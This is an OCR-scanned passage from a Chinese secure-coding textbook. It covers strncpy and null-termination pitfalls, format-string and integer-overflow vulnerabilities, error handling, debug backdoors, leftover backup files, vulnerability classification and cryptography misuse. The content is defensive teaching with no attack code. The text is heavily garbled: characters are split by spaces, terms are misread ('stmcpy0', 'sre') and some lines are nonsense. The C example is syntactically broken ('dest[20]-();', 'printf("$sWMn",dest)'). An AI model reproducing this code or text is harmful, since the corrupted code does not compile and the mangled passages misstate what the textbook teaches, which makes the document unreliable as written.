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相对 于 无 界 函数 而 言 ， 有 界 字符 串 函 数 更 安全 一 些 ， 但 仍 可 能 产生 错误 。 下 面 就 是 程序 
员 在 使 用 这 些 有 界 字符 串 时 经 常会 遇 到 的 错误 : 

Q 因为 边界 是 根据 源 数 据 的 大 小 (而 不 是 目标 缓冲 区 的 大 小 ) 来 确定 的 , 所 以 可 能 导致 目 
标 缓冲 区 溢出 。 

@ 目标 缓冲 区 中 没有 添加 一 个 Null 终止 符 ， 这 通常 是 因为 o 全 by-one 错误 而 导致 的 。 

© 因为 边界 指定 为 缓冲 区 的 总 容量 而 不 是 其 剩余 空间 ， 所 以 导致 目标 缓冲 区 溢出 。 

© 因为 目标 缓冲 区 没有 设置 一 个 Null 终止 符 ， 所 以 ， 函 数 在 目标 缓冲 区 的 第 一 个 零 字 
符 所 在 位 置 后 写 入 数据 ， 从 而 导致 应 用 程序 在 内 存 的 任意 位 置 写 入 数据 。 

为 避免 发 生 这 些 问 题 ， 首 先 提出 的 建议 就 是 ， 避 免 使 用 两 个 最 常 被 误 用 的 有 界 字符 串 操 
TERRA: stmcpy0 和 strenat0; 然后 探讨 关于 字符 串 截断 导致 发 生 错误 的 更 加 广泛 的 主题 ， 
为 即使 正确 调用 有 界 函 数 ， 这 些 错误 也 可 能 发 生 。 我 们 以 strmmcpy0 为 例 来 分 析 下 面 的 例子 : 

fincludecstdio.h» 

fincludecstring.h» 

int main() 

( char company[]-("Hopepact"],dest[20]-(); 

strncpy (dest, company, 9); 

printf("$sWMn",dest); } 

CICH, stmepyO PRU Je EB sre 中 的 内 容 (字符 、 数 字 、 汉 字 ..) 复 制 到 字 
符 串 dest 中 ， 复 制 多 少 由 size tn 的 值 决定 。 如 果 sre 的 前 n 个 字 节 不 含 NULL 字符 ， 则 结果 
不 会 以 NULL 字符 结束 。 如 果 sre 的 长 度 小 于 nm 个 字 节 ， 则 以 NULL 填充 dest 直到 复制 完 n 
APTA. sro 和 dest 所 指 内 存 区 域 不 可 以 重 登 且 dest 必须 有 足够 的 空间 来 容纳 re 的 字符 长 度 
TN. 


1) src 串 长 度 <=dest 串 长 度 (这 里 的 串 长 度 包含 串 尾 NULL. 字符 ) 


如 果 n>sre， 由 于 长 度 达到 sre NULL， 正 常 复制 ， 特 别 注意 ， 如 果 src 中 有 NULL, W 
stmcpy 复制 到 NULL， 即 使 没 到 n 也 提前 停止 。 如 果 n = src 串 长 度 ， 则 与 strepy 一 致 。 注 意 
n 的 选择 ， 当 nm > dest 串 长 度 ， 那 么 dest 栈 空 间 溢出 ， 产 生 骨 省 异常 。 


2) src 串 长 度 >dest 串 长 度 

WR n dest 串 长 度 ， 则 dest 串 没有 NULL 字符 ， 会 导致 输出 会 有 乱码 。 如 果 不 考虑 sre 
串 复 制 完整 性 ， 则 可 以 将 dest 最 后 一 字符 置 为 NULL。 

* 保留 Null 终止 符 

TE C 语言 中 ， 字 符 串 正确 与 否 依赖 于 是 否 正 确 地 使 用 Null 终止 符 ， 没 有 Null 终止 符 ， 
就 不 能 够 确定 字符 串 的 大 小 。 这 种 依存 关系 是 相当 脆弱 的 ， 因 为 ， 它 依赖 于 字符 串 的 内 容 来 
保证 与 字符 串 相 关 的 操作 能 否 正 确 运 行 。 

字符 串 终 止 错误 可 以 轻易 导致 缓冲 区 溢出 和 逻辑 错误 。 这 些 问 题 常常 比较 隐蔽 ， 因 为 它 
们 的 发 生 似乎 总 是 非常 确定 的 ， 往 往 依 赖 于 程序 执行 时 的 内 存 状 态 。 在 一 个 存在 很 多 漏洞 的 
应 用 程序 执行 期 间 ， 位 于 一 个 没有 正确 终止 的 字符 串 变量 之 后 的 内 存 可 能 恰好 是 空 的 ， 所 以 
完全 掩盖 了 错误 ， 但 在 同一 个 应 用 程序 的 不 同 执行 中 ， 位 于 这 个 字符 串 后 的 内 存 也 许 是 非 空 
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的 ， 导 致 与 这 个 字符 串 相 关 的 操作 完全 错误 地 运行 。 在 复杂 程序 中 ， 依 赖 于 内 存 运 行 状态 的 
漏洞 难以 查找 ， 往 往 直 到 程序 在 实际 运行 环境 中 运行 时 才 会 发 现 ， 因 为 真实 环境 与 测试 环境 
相 比 而 言 ， 程 序 运 行 的 时 间 更 长 ， 所 处 的 环境 更 复杂 。 

。 字符 集 、 表 达 式 和 编码 

字符 集 是 打印 字符 的 集合 ,通常 对 应 于 在 书写 语言 中 使 用 的 字符 。 随 着 各 种 软件 程序 遍 
及 世界 各 地 ， 已 经 定义 出 各 种 不 同 的 字符 集 来 满足 使 用 不 同 语言 的 人 们 的 需求 。Unicode 标 
准 定义 了 一 个 通用 字符 集 ， 包 含 了 全 世界 每 一 种 主要 的 书写 符号 以 及 一 套 字 符 编码 格式 来 存 
储 、 操 作 和 共享 各 应 用 系统 之 间 的 文本 信息 。 

提交 给 计算 机 的 字符 采用 了 字符 编码 格式 ， 这 些 格式 制定 了 整数 值 和 打印 字符 之 间 的 一 
个 映射 。 编 码 方式 基本 上 分 为 两 类 : 固定 宽度 和 可 变 宽度 。 固 定 宽度 编码 使 用 固定 的 位 数 来 
代表 每 个 码 点 ， 固 定 宽度 编码 具有 一 致 性 ， 更 便于 计算 机 和 程序 员 操作 。 但 是 如 果 在 某 些 字 
符 串 中 只 使 用 了 一 小 部 分 码 点 ， 那 么 固定 宽度 编码 方式 就 不 够 高 效 。 采 用 可 变 宽度 编码 ， 某 
些 字符 用 较 少 的 位 来 表示 ， 而 某 些 字符 用 较 多 的 位 来 表示 就 可 以 克服 这 个 问题 。 

。 格式 串 

当 人 允许 用 户 输入 影响 某 些 字符 串 格式 化 函数 的 格式 串 参 数 时 ， 可 能 会 发 生 格式 错误 。 下 
面 简单 讨论 格式 串 漏洞 。 

格式 中 漏洞 早 在 1999 年 就 被 广泛 认定 了 。 软 件 行业 已 经 用 了 十 几 年 的 时 间 来 讨论 缓冲 
区 溢出 漏洞 , 但 当 2000 年 格式 串 漏洞 被 广 为 利 用 时 , C 和 C++ 中 经 常 出 现 的 一 个 常见 弱点 突 
然 引起 了 公众 的 注意 ， 大 量 软 件 受 到 影响 。 

C 和 C++ 中 的 字符 串 格式 化 函数 ， 例 如 printf， 都 设计 得 尽 可 能 灵活 。 因 为 有 效 的 格式 
串 并 不 要 求 必须 包含 指令 或 转换 说 明 ， 所 以 ， 格 式 串 参数 可 用 于 处 理 不 需要 格式 化 的 函数 。 
格式 串 以 外 的 任何 参数 、 对 应 格式 指令 或 者 转换 说 明 符 都 是 可 选 的 ， 这 种 灵活 性 本 质 上 是 一 
个 类 型 问题 ， 会 让 程序 员 在 编写 时 采用 一 些 简便 写法 ， 虽 然 这 样 操作 表面 上 不 会 带 来 任何 错 
误 ， 因 为 标准 字符 只 是 简单 地 通过 格式 串 传递 ， 没 有 任何 改变 ， 但 它 是 导致 格式 串 漏洞 的 最 
常见 方式 之 一 。 

虽然 漏洞 利用 方式 有 很 多 而 且 很 复杂 ， 但 如 果 在 下 列 原则 中 ， 选 择 一 个 可 在 应 用 程序 环 
境 中 执行 最 严格 的 限制 ， 那 么 绝 大 部 分 格式 串 漏洞 是 可 以 避免 的 : 

D 对 任何 接受 格式 串 参 数 的 函数 ， 都 只 传递 静态 格式 串 。 

@ 如 果 只 传递 某 个 固定 的 静态 格式 串 的 限制 太 严格 ， 可 定义 一 个 有 效 的 格式 串 集 合 ， 
然后 从 这 个 安全 的 集合 中 选择 格式 串 。 

© 如 果 应 用 程序 必须 要 求 格式 串 包 括 从 应 用 程序 外 部 读 入 的 输入 ， 那 么 对 于 从 应 用 程 
序 外 部 读 入 的 、 将 要 包含 在 格式 串 中 的 值 ， 应 执行 严格 的 、 基 于 白 名单 的 输入 验证 。 

。 更 完善 的 字符 串 类 和 类 库 

就 像 C 语言 本 身 一 样 ，C 语言 中 的 字符 串 更 多 考虑 了 有 效 性 和 简单 性 ， 而 不 是 稳健 性 和 
安全 性 。 使 用 Null 终止 字符 串 具有 更 高 的 内 存 使 用 效率 ， 却 容易 出 错 。C 字符 串 的 替代 表示 
方法 不 需要 将 防止 缓冲 区 溢出 作为 一 个 功能 来 强调 其 安全 性 。 如 果 使 用 C++ 语言 ， 则 使 用 标 
HE STL 命名 空间 中 所 定义 的 字符 串 表示 法 ， 即 stdzstring. std::string 类 在 底层 的 字符 串 表示 
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外 添加 了 一 个 抽象 层 ， 提 供 了 执行 绝 大 部 分 字符 串 操作 的 方法 ， 并 且 不 用 冒 着 引入 缓冲 区 淤 
出 漏洞 的 风险 。 

虽然 存在 大 量 用 于 替换 C 语言 类 库 的 其 他 字符 串 处 理 类 库 和 表示 方法 , 但 是 并 没有 哪 一 
个 得 到 广泛 使 用 。 绝 大 部 分 程序 员 仍然 继续 使 用 C 语言 本 身 带 的 字符 串 ， 并 且 寄 希望 于 它们 
可 以 避免 错误 。 选 择 一 种 能 够 更 容易 地 避免 缓冲 区 溢出 的 字符 串 表 示 方 法 ， 就 可 以 更 容易 地 
编写 出 安全 的 应 用 程序 ， 并 且 能 带 来 其 他 好 处 。C 语言 中 Null 终止 字符 串 在 设计 时 侧重 于 编 


程 方便 ， 转 为 寻求 其 他 不 同 的 字符 串 表 示 方法 时 ， 可 以 注意 到 程序 运行 性 能 的 提高 ， 具 体 指 
标 根 据 所 执行 的 字符 串 操 作 类 型 而 异 。 
2) 整数 


缓冲 区 溢出 的 原因 不 全 是 字符 串 操 作 错 误 ， 即 使 选用 更 好 的 字符 串 操作 函数 也 无 法 保证 
不 再 发 生 缓冲 区 溢出 。 当 一 个 整数 值 超出 分 配 空 间 所 能 表示 的 范围 时 ， 就 会 发 生 整 数 溢出 错 
误 ， 而 它 通常 就 是 攻击 者 进行 缓冲 区 溢出 攻击 的 前 奏 。 最 常见 的 缓冲 区 溢出 是 数字 类 溢出 
这 是 因为 程序 中 操作 最 多 的 是 数字 类 数据 。 同 样 ， 不 是 每 一 种 应 对 缓冲 区 溢出 攻击 的 对 策 ， 
都 是 以 明智 的 字符 串 操作 形式 来 实现 的 。 

下 面 首先 介绍 整数 溢出 错误 以 及 其 导致 缓冲 区 溢出 攻击 的 一 般 原理 。 

如 果 一 个 操作 所 传递 的 变量 可 能 超过 最 大 或 最 小 值 范围 ， 就 可 能 是 缓冲 区 溢出 的 前 兆 。 
因为 所 有 内 团 整 数 类 型 都 用 一 个 固定 位 数 表示 ， 所 以 其 表示 范围 有 限 。 有 时 ， 程 序 员 忽略 了 
这 个 事实 ， 认 为 整 型 变量 和 数学 中 的 整数 一 样 ， 没 有 上 下 限 。 实 际 上 ,与 数学 中 的 整数 不 同 ， 
程序 中 的 变量 范围 固定 ， 当 值 超出 最 大 或 最 小 值 范围 时 ， 就 会 “ 回 绕 ” 比如 ， 一 个 非常 大 的 
正 数 变 成 一 个 非常 大 的 负数 ， 反 之 亦 然 。 

如 果 攻 击 者 利用 这 种 回 绕 错误 ， 应 用 程序 就 会 面临 一 个 整数 溢出 攻击 。 整 数 溢出 能 导致 
许多 问题 ， 但 在 C 和 C++ 中 ， 最 常见 的 是 将 整数 溢出 作为 缓冲 区 溢出 利用 的 “先头 部 队 ”。 
当 使 用 可 能 发 生 回 绕 的 变量 来 分 配 内存 、 限 制 字符 串 操作 范围 或 作为 指向 缓冲 区 的 指针 时 ， 
可 能 发 生 缓冲 区 溢出 。 在 Java 中 ， 也 可 能 发 生 整数 溢出 ， 但 因为 Java 强制 执行 内 存 安全 性 
策略 ， 所 以 整数 溢出 漏洞 相对 不 容易 被 利用 。 

下 面 主要 讨论 整数 溢出 和 数字 转换 错误 发 生 的 各 种 形式 : 

ul 

回 绕 错误 是 整数 溢出 的 典型 示例 ， 在 一 个 整数 值 超出 其 数据 类 型 所 限定 范围 的 情况 下 ， 
就 会 产生 回 绕 错 误 。 就 像 回 绕 错 误会 引起 整数 上 溢 。 

。 截断 和 符号 位 扩展 

当 一 个 整数 类 型 的 数据 向 一 个 比 自己 位 数 少 的 数据 类 型 转换 时 ， 就 会 产生 整数 截断 错 
误 。C 和 C++ 通过 截 去 高 阶 位 来 进行 这 种 转换 。 当 一 个 有 符号 整数 从 较 少 的 位 数 转换 为 较 多 
的 位 数 时 ， 多 余 位 数 将 被 填充 以 保持 原 有 符号 ， 与 前 面 截 断 操作 的 方向 正好 相反 。 这 就 意味 
着 ， 如 果 一 个 负数 被 转换 成 一 个 更 大 的 数据 类 型 ， 它 的 有 符号 值 将 保持 不 变 。 但 它 的 无 符号 
值 将 急剧 增加 ， 这 是 因为 它 最 重要 的 数据 位 会 被 设置 值 。 

。 有 符号 数 和 无 符号 数 之 间 的 转换 

。 检测 和 防止 整数 溢出 的 方法 
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没有 简单 的 、 容 易 遵循 的 建议 能 完全 消除 整数 溢出 和 类 型 转换 错误 ， 像 许多 缓冲 区 溢出 
漏洞 一 样 ， 整 数 溢出 几乎 不 可 能 被 完全 防止 。 


443 ”错误 和 异常 


安全 问题 的 发 生 常 常 是 因为 攻击 者 找到 了 某 种 违背 程序 员 初 囊 的 途径。 程序 员 通 常 不 会 
耗费 精力 完全 考虑 错误 条 件 和 异常 情况 ， 但 是 这 种 忽视 的 地 方 将 使 攻击 者 具有 利用 程序 自身 
失误 发 起 攻击 的 能 力 。 本 节 将 主要 考虑 常见 错误 和 异常 处 理 方法 所 隐 含 的 安全 问题 。 本 节 所 
讨论 的 大 部 分 错误 不 会 像 缓冲 区 溢出 或 SQL 注入 一 样 直接 导致 可 利用 漏洞 。 但 它们 会 为 随后 
发 生 的 安全 问题 提供 必要 条 件 。 

通常 ,编写 应 用 程序 所 用 的 计算 机 语言 确定 了 这 个 应 用 程序 用 于 发 现 及 处 理 异常 情况 的 
方法 。C 语言 提供 错误 代码 作为 函数 的 返回 值 。Java 使 用 已 检测 异常 。C++ 混 合 使 用 返回 值 
和 未 检测 异常 。 不 管 采用 哪 种 方法 ， 不 完善 的 处 理 机 制 通常 会 导致 资源 泄漏 。 错 误 处 理 代码 
常常 也 可 能 导致 日 志 或 调试 软件 问题 。 

1. 利用 返回 代码 处 理 错误 


利用 函数 返回 值 表示 函数 是 否 执行 成 功 ， 是 一 个 简单 明了 的 方法 。 但 是 ， 这 个 方法 伴随 
着 大 量 副 作用 : 

1) 易于 忽略 错误 ( 仅 忽 略 函数 返回 值 ); 

2) 错误 处 理 代 码 和 错误 信息 交织 在 一 起 ,从 而 程序 变 得 难以 理解 。 如 果 错误 处 理 巡 辑 中 
又 夹杂 着 处 理 正常 情况 的 逻辑 ， 就 更 容易 忽略 错误 了 ; 

3) 因为 没有 任何 约定 俗 成 的 通用 方式 来 表示 错误 信息 , 所 以 程序 员 必 须 研 究 所 调用 的 每 
个 函数 的 错误 处 理 机 制 。 

e 检查 C 语言 中 的 返回 值 。 

e 检查 Java 中 的 返回 值 。 

2. 管理 异常 


异常 可 以 解决 很 多 错误 处 理 问题 。 虽 然 ， 只 要 简单 地 省 略 查找 函数 返回 值 的 代码 ， 就 可 
以 容易 地 忽略 函数 的 返回 值 ， 但 忽略 一 个 已 检测 的 异常 则 需要 做 相反 的 工作 一 一 程序 员 必须 
为 此 编制 专门 的 代码 。 异 常 分 为 允许 遵循 正常 路 径 的 代码 和 处 理 异 常情 况 的 代码 。 

异常 包括 已 检测 的 异常 和 未 检测 的 异常 。 其 不 同 之 处 在 于 ， 编 译 器 是 否 将 使 用 静态 分 析 
以 确保 异常 被 处 理 。 假 如 一 个 方法 声明 抛 出 一 个 已 检测 的 异常 ， 所 有 调用 它 的 方法 就 必须 处 
理 这 个 异常 或 者 声明 同样 也 抛 出 这 个 异常 。 这 就 迫使 程序 员 考虑 所 有 可 能 会 发 生 已 检测 异常 
的 地 方 。Java 编译 器 强制 执行 这 些 与 已 检测 异常 相关 的 规则 ，Java 类 库 提 供 了 自由 利用 已 检 
测 异 常 的 功能 。Java 类 javalang .Exception 就 是 一 个 已 检测 异常 。 

未 检测 异常 可 以 不 必 声 明和 处 理 。C++ 中 的 所 有 异常 都 是 未 检测 的 ， 这 就 意味 着 程序 
员 可 以 完全 忽略 可 能 会 出 现 异 常 这 个 事实 ， 其 编译 器 也 不 会 发 出 警告 。Java 也 提供 了 未 检 
测 异 常 。 

带 有 未 检测 异常 的 风险 是 : 程序 员 可 能 意识 不 到 在 给 定 上 下 文 环境 中 可 能 会 发 生 异常 ， 
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可 能 会 忽略 适当 地 处 理 错误 。 
。 捕获 项 层 的 所 有 东西 
。 消失 的 异常 
。 只 捕获 需要 处 理 的 异常 
。 控制 已 检测 的 异常 
3. 防止 资源 泄漏 


未 能 释放 资源 (包括 数据 库 对 象 、 文 件 句柄 和 套 接 字 ) 可 能 会 导致 严重 的 性 能 问题 。 要 想 
找 出 这 些 问题 的 原因 比较 困难 。 这 种 情况 通常 是 在 不 寻常 环境 下 或 系统 负荷 太 重 时 偶然 发 生 
的 ， 所 以 很 难 根据 生成 的 错误 信息 查找 到 资源 泄漏 的 位 置 。 一 个 简单 的 示例 : closeO 调 用 完 
全 被 忽略 。 但 更 常见 的 是 ， 这 个 问题 不 得 不 处 理 极 少 使 用 的 代码 路 径 ， 它 们 通常 包含 错误 的 
条 件 或 异常 。 

在 C、C++ 以 及 任何 其 他 依靠 人 工 进行 内 存 管理 的 语言 中 ， 对 分 配 内 存 必 须 像 释放 其 他 
资源 一 样 被 释放 。 不 管 资源 中 包含 什么 东西 ， 释 放 的 方法 总 是 相同 的 。 下 面 给 出 了 与 对 分 配 
内 存 、 文 件 句柄 、 数 据 库 连 接 相 关 的 示例 ， 但 是 同样 的 模式 可 应 用 于 其 他 所 有 资源 。 

不 恰当 地 管理 资源 所 导致 的 安全 性 后 果 都 是 一 样 的 。 假 如 程序 不 能 正确 管理 资源 ， 那 么 
攻击 者 就 很 容易 对 程序 发 起 拒绝 服务 攻击 。 但 引入 这 个 主题 ， 主 要 是 因为 在 执行 安全 代码 审 
查 时 ， 经 常 遭 遇 资 源 管理 问题 。 由 资源 泄漏 引起 的 问题 类 似 于 安全 性 问题 ， 因 为 运用 传统 的 
测试 方法 无 法 识别 和 跟踪 它们 。 

不 论 你 把 资源 泄漏 分 为 安全 风险 问题 (因为 资源 泄漏 可 能 会 导致 拒绝 服务 攻击 )， 还 是 一 
种 普通 的 质量 问题 (因为 其 可 能 与 性 能 相关 )， 其 解决 方案 是 相同 的 ， 建立 资源 管理 体系 。 因 
为 错误 处 理 代码 与 资源 泄漏 之 间 的 关系 , 错误 处 理 模式 必须 在 各 种 条 件 下 (不 仅 是 某 些 期 望 的 
情况 ) 清 晰 指明 资源 管理 方式 。 

4. 日 志 记录 和 调试 


日 志 记 录 和 调试 都 能 深入 了 解 在 程序 执行 过 程 中 、 特 别 是 在 发 生 错误 或 出 现 预料 外 的 情 
况 时 ， 发 生 了 什么 。 下 面 将 阐述 创建 一 个 持续 日 志 记录 操作 和 将 调试 辅助 程序 从 二 进 制 代 码 
中 分 离 的 优点 。 

利用 一 个 集中 日 志 结构 。 集 中 框架 结构 有 利于 以 下 工作 : 

1) 提供 一 种 通过 日 志 记录 反映 出 来 的 一 致 和 统一 的 系统 视角 ; 

2) 方便 修改 , 例如 : 将 日 志 移 到 另 一 台 机 器 上 、 将 记录 到 文件 的 日 志 改 为 记录 到 数据 库 ， 
更 新 有 效 性 或 私有 标准 。 

不 论 选 什么 ， 必 须 确 保 在 代码 中 一 直 运 用 一 样 的 日 志 记录 机 制 。 尽 量 不 要 用 System.out 
和 System.err 进行 特别 记录 ， 因 为 它们 很 难 确认 正确 操作 还 是 日 志 记录 约定 更 新 。 接 下 来 将 
讨论 良好 日 志 记录 的 一 些 基 本 要 求 : 带 时 间 戳 的 记录 条 目 、 记 录 所 有 重要 行为 、 可 控 地 访问 
记录 数据 。 

谨慎 地 将 调试 代码 和 系统 分 离开 来 ， 以 便 它 绝对 不 出 现在 产品 部 署 中 。 每 个 人 都 增加 代 
码 容易 泄露 系统 的 额外 信息 。 最 有 效 的 调试 技术 是 在 程序 自身 中 设计 和 构建 的 调试 技术 ， 当 
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今 在 许多 最 好 程序 员 的 程序 中 接近 一 半 的 内 容 都 用 于 简化 另 一 半 程 序 的 调试 过 程 。 前 一 半 内 
容 将 最 终 被 抛弃 ， 即 使 这 样 ， 其 性 能 也 可 能 更 好 。 问 题 是 ， 如 果 这 种 扩展 行为 离开 调试 环境 
并 进入 应 用 环境 中 ， 将 对 系统 的 安全 造成 潜在 危害 。 调 试 代码 没有 像 程序 其 他 部 分 一 样 接收 
同等 级 别 的 检查 和 测试 ， 并 且 编 写 时 也 没有 从 稳定 性 、 性 能 和 安全 方面 考虑 。 

“后 门 ” 访 问 代 人 码 是 调试 代码 的 一 个 特别 情况 。“ 后 门 ”访问 代码 允许 开发 者 和 测试 者 
通过 终端 用 户 不 能 使 用 的 方法 访问 应 用 程序 ,在 孤立 环境 中 或 应 用 程序 被 配置 到 应 用 环境 前 ， 
“后 门 ”访问 代码 是 应 用 程序 必要 的 测试 组 成 部 分 。 但 是 ， 假 如 “后 门 ”访问 代码 被 发 送 到 
实际 产品 中 ， 攻 击 者 就 可 以 使 用 程序 设计 和 调试 过 程 中 没有 考虑 到 的 方法 攻击 程序 ， 经 常 可 
以 绕 过 运行 过 程 中 的 安全 机 制 。 当 这 种 类 型 的 调试 代码 意外 存在 于 产品 中 时 ， 这 个 应 用 程序 
无 意 之 中 开放 了 交互 模式 。 因 为 这 些 “ 后 门 ” 进 入 点 在 设计 或 测试 时 没有 被 考虑 进来 ， 且 在 
应 用 程序 期 望 的 操作 条 件 之 外 ， 它 会 引起 安全 风险 。 

遗忘 调试 代码 最 常见 的 示例 是 ，Web 应 用 程序 中 的 main0 方 法 。 尽 管 这 是 在 产品 开发 过 
程 中 可 接受 的 惯例 ， 但 JEE 应 用 程序 的 部 分 类 不 应 该 定义 main0 方 法 。 其 他 “后 门 ”访问 
机 制 的 示例 通常 包括 ,在 应 用 被 配置 前 允许 综合 测试 或 简化 管理 过 程 的 Web 访问 节点 。 如 果 
它们 被 忘记 了 ， 则 存在 更 大 的 风险 ， 因 为 它们 可 以 被 Web 上 的 任何 人 访问 ， 而 不 仅 是 可 以 局 
部 调用 main0 方 法 的 用 户 。 

确保 那些 没 用 的 、 临 时 的 、 备 份 的 文件 不 出 现在 产品 中 。 备 份 文件 是 软件 开发 过 程 中 的 
附属 品 。 创 建 它们 的 原因 有 很 多 ， 例 如 ， 程 序 员 在 抛弃 先前 工作 前 想 验 证 其 他 新 功能 ， 或 者 
测试 者 需要 用 给 定 组 件 的 不 同 版 本 测试 不 同 场景 或 不 同 模块 。 不 论 创 建 临 时 文件 的 原因 是 什 
么 ， 攻 击 者 可 以 通过 临时 文件 在 攻击 产品 前 对 它 的 大 致 构 型 有 一 个 粗略 了 解 。 因 为 临时 文件 
反映 了 之 前 代码 或 设置 ， 所 以 它们 也 最 容易 遭受 安全 攻击 或 出 现 其 他 错误 。 应 用 程序 框架 也 
会 用 不 同 的 方式 对 待 临时 文件 ， 例 如 ， 名 为 index jsp 的 文件 将 被 编译 成 Java 服务 器 端 页 面 ， 
而 名 为 index.jsp.bak 的 文件 可 能 在 源 代码 中 以 文本 的 形式 出 现 。 

自动 Web 攻击 工具 通过 识别 暴露 在 整个 站 点 中 的 文件 名 的 方式 来 搜索 备份 文件 。 例 如 ， 
假如 一 个 站 点 包含 文件 welcomejsp， 攻 击 工具 将 请 求 welcome.jsp.bak、welcome.jsp.txt、 
welcome.jsp 和 welcome.jsp.zip 等 文件 。 确保 查 明 所 有 这 种 类 型 的 最 简单 方法 是 ,确定 不 配置 
备份 文件 。 从 输入 确认 技术 中 获得 线索 ， 建 立 一 个 所 发 布 文件 的 白 名 单 。 当 然 ， 也 非常 有 必 
要 对 应 用 程序 的 发 布 版 本 进行 测试 。 不 要 把 工作 都 留 给 测试 工具 来 猜测 哪 种 垃圾 文件 已 经 丢 
掉 ， 确 保 所 有 的 配置 文件 都 有 合适 的 文件 扩展 名 是 部 署 过 程 的 一 部 分 。 


45 ”软件 漏洞 


关于 软件 漏洞 ， 我 们 在 第 1 章 中 就 曾 提 到 过 ， 但 是 我 们 仅仅 是 从 安全 角度 进行 了 简要 的 
介绍 。 本 节 我 们 将 对 软件 漏洞 问题 进行 系统 的 分 析 ， 主 要 包括 软件 漏洞 的 分 类 ， 编 程 语言 
实现 ， 平 台 实现 等 方面 。 
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4.5.1. 软件 漏洞 的 分 类 


软件 安全 漏洞 可 分 为 两 大 类 别 : 设计 漏洞 和 实现 漏洞 。 

如 果 程 序 设计 不 合理 ， 那 么 程序 将 永远 不 可 能 满足 其 需求 和 目标 。 如 果 不 遵 循 这 里 所 讲 
述 的 经 验 ， 即 便 程序 有 着 广 受 好 评 的 安全 设计 ， 仍 然 包含 实现 方面 的 缺陷 ， 而 这 些 最 终 将 导 
致 软件 容易 受到 攻击 。 软 件 设计 要 解决 的 问题 是 ， 为 满足 软件 需求 所 需 的 任务 ， 程 序 的 各 组 
件 彼此 间 如 何 进行 交互 。 它 将 规定 系统 构架 ， 确 定 各 组 件 可 能 的 状态 ， 并 详细 说 明 各 组 件 之 
间 的 数据 流 。 软 件 设计 必须 明确 安全 模型 的 结构 ， 如 果 程序 有 要 求 安全 机 制 的 功能 特性 ， 那 
么 必须 在 设计 中 规定 安全 机 制 如 何 运作 。 例 如 ， 在 一 个 多 用 户 程序 中 ， 其 设计 会 规定 用 户 如 
何 进行 身份 鉴别 、 如 何 授权 以 及 如 何 对 其 活动 进行 审计 。 几 乎 每 个 获取 输入 的 程序 都 需要 有 
安全 设计 来 规定 如 何 缓解 威胁 。 设 计 漏 洞 属于 设计 错误 ， 它 使 得 编程 人 员 即 使 编写 完美 代码 
也 无 法 实现 程序 的 安全 运行 。 设 计 漏洞 常 存在 于 软件 的 安全 功能 特性 中 ， 例 如 ， 当 使 用 密码 
技术 时 ， 却 常 在 与 安全 功能 并 不 直接 联系 的 系统 其 他 部 分 中 出 现 密码 相关 的 东西 。 安 全 的 设 
计 要 求 有 经 验 并 经 过 培训 ， 而 许多 软件 工程 师 却 没有 在 安全 工程 技术 方面 得 到 适当 的 指导 。 

实现 漏洞 是 由 软件 实际 编码 中 的 安全 缺陷 造成 的 。 它 们 就 像 是 复杂 的 喷气 式 飞 机 某 部 分 
中 精密 铸件 上 的 微小 裂纹 或 瑕 盖 。 无 论 这 架 飞 机 设计 得 多 么 好 ， 在 某 种 环境 条 件 下 ， 施 加 特 
定 的 压力 ， 这 种 微小 的 裂纹 将 会 导致 飞机 失事 。 在 软件 中 ， 一 般 情况 下 这 些 缺 陷 看 起 来 就 像 
是 马虎 的 编码 行为 。 它 们 往往 看 上 去 微不足道 ， 比 如 忘记 了 字符 串 变量 是 Unicode 字符 类 型 
的 (每 个 字符 占用 两 个 字 节 ), 在 计算 缓冲 区 时 本 应 是 偏 移 量 为 2, 但 在 实际 编码 时 却 按 照 偏 移 
量 为 1 错误 地 计算 缓冲 区 。 然 而 ， 这 些微 小 的 错误 如 果 恰 好 出 现在 不 当 位 置 又 恰好 被 攻击 者 
发 现 , 那么 它 将 变 成 一 个 十 分 危险 的 安全 漏洞 。 优秀 的 安全 软件 设计 人 员 会 使 用 诸如 分 类 法 、 
最 小 权限 、 攻 击 面 缩减 、 密 码 技术 等 安全 技术 ， 将 实现 缺陷 的 影响 或 严重 程度 控制 到 最 低 限 
度 。 分 类 法 就 是 使 用 高 度 的 抽象 和 健壮 的 接口 验证 ， 以 确保 模型 的 正确 使 用 。 最 小 权限 就 是 
只 授予 用 户 或 进程 完成 其 工作 所 需 的 最 低 权限 。 攻 击 面 缩减 是 指 只 保留 那些 完成 软件 功能 绝 
对 需要 的 接口 ， 非 必需 接口 予以 取缔 。 如 果 去 除 低 优 先 级 的 功能 有 可 能 减少 攻击 面 的 话 ， 则 
去 除 这 些 功能 性 。 但 是 ， 对 于 商业 软件 来 说 ， 这 样 做 有 些 困 难 ， 因 为 对 于 这 些 低 优先 级 的 部 
分 是 否 最 终 成 为 软件 的 特性 ， 市 场 的 考虑 要 胜 过 工程 的 考虑 。 密 码 技术 可 用 来 对 数据 提供 保 
护 ， 这 样 即使 某 个 安全 机 制 失效 ， 由 于 无 法 解密 数据 ， 攻 击 者 也 只 能 无 功 而 返 。 优 秀 的 安全 
性 设计 会 交叉 使 用 多 种 技术 。 

如 果 软 件 在 设计 时 缺少 对 安全 的 关注 ,那么 在 后 期 就 很 难 或 者 几乎 不 可 能 使 之 成 为 安全 
的 软件 。 另 一 方面 ， 安 全 的 设计 也 不 能 防止 或 减缓 所 有 的 实现 缺陷 。 所 以 ， 即 使 设计 堪 称 一 
份 杰 作 ， 实 现 细 节 也 依然 重要 ， 必 须 坚 持 安全 的 编码 标准 ， 实 现 的 东西 必须 经 过 测试 。 


452 ”常见 的 安全 设计 问题 


1. 密码 技术 使 用 中 的 隐患 


1) 密码 技术 选用 不 当 
一 般 情况 下 ， 应 该 使 用 经 权威 安全 机 构 认可 的 算法 ， 因 为 这 些 算法 经 过 了 密码 阻止 的 严 
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格 审查 ， 而 且 包 含 了 所 需要 的 各 种 类 型 的 算法 。 对 称 密码 技术 和 公 钥 密码 技术 是 两 种 主要 的 
密码 技术 。 在 对 称 密码 技术 内 有 块 密码 和 流 密码 ， 块 密码 要 求 选择 一 种 操作 模式 。 对 称 密码 
技术 要 求 在 发 送 端 和 接收 端 均 使 用 固定 的 密 钥 ， 因 此 ， 对 密 钥 的 管理 就 成 了 一 个 问题 。 公 和 钥 
密码 技术 允许 发 送 端 和 接收 端 分 别 使 用 自己 的 密 钥 ， 在 常见 的 SSL(Secure Sockets Layer， 安 
全 套 接 字 层 ) 中 , 就 一 起 使 用 了 这 种 技术 和 对 称 加 密 技 术 。 密 码 散 列 函数 和 消息 验证 编码 比较 
适用 于 侦察 自 改 行为 或 进行 消息 签名 的 安全 机 制 。 


